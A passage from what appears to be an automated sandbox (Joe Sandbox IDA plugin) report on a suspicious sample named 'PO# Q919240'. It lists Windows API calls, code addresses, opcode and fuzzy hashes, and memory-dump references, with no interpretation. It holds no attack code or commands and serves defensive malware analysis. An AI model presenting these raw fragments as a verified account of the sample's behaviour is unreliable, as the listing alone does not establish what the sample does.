                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                APIs
                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: Msctls_Progress32
                • API String ID: 3850602802-3636473452
                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                • String ID:
                • API String ID: 3985565216-0
                • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                APIs
                • _malloc.LIBCMT ref: 0041F707
                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                • _free.LIBCMT ref: 0041F71A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID: [B
                • API String ID: 1020059152-632041663
                • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                • __calloc_crt.LIBCMT ref: 00413DB0
                • __getptd.LIBCMT ref: 00413DBD
                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                • _free.LIBCMT ref: 00413E07
                • __dosmaperr.LIBCMT ref: 00413E12
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                • String ID:
                • API String ID: 155776804-0
                • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                APIs
                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                • String ID:
                • API String ID: 1957940570-0
                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                • ExitThread.KERNEL32 ref: 00413D4E
                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                • __freefls@4.LIBCMT ref: 00413D74
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                • String ID:
                • API String ID: 259663610-0
                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                APIs
                • GetClientRect.USER32(?,?), ref: 004302E6
                • GetWindowRect.USER32(00000000,?), ref: 00430316
                • GetClientRect.USER32(?,?), ref: 00430364
                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                • GetWindowRect.USER32(?,?), ref: 004303C3
                • ScreenToClient.USER32(?,?), ref: 004303EC
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Rect$Client$Window$MetricsScreenSystem
                • String ID:
                • API String ID: 3220332590-0
                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _malloc_wcslen$_strcat_wcscpy
                • String ID:
                • API String ID: 1612042205-0
                • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove_strncmp
                • String ID: >$U$\
                • API String ID: 2666721431-237099441
                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                APIs
                • GetKeyboardState.USER32(?), ref: 0044C570
                • SetKeyboardState.USER32(00000080), ref: 0044C594
                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$InputSend
                • String ID:
                • API String ID: 2221674350-0
                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcscpy$_wcscat
                • String ID:
                • API String ID: 2037614760-0
                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                APIs
                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$Copy$AllocClearErrorLastString
                • String ID:
                • API String ID: 960795272-0
                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                APIs
                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                • GetWindowRect.USER32(?,?), ref: 00447C5D
                • ScreenToClient.USER32(?,?), ref: 00447C7B
                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                • EndPaint.USER32(?,?), ref: 00447D13
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                • String ID:
                • API String ID: 4189319755-0
                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                APIs
                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$LongWindow$InvalidateRect
                • String ID:
                • API String ID: 1976402638-0
                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                APIs
                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                • ShowWindow.USER32(?,00000000), ref: 00440B18
                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                • EnableWindow.USER32(?,00000001), ref: 00440B50
                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Show$Enable$MessageSend
                • String ID:
                • API String ID: 642888154-0
                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$Copy$ClearErrorLast
                • String ID: NULL Pointer assignment$Not an Object type
                • API String ID: 2487901850-572801152
                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                APIs
                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                Memory Dump Source
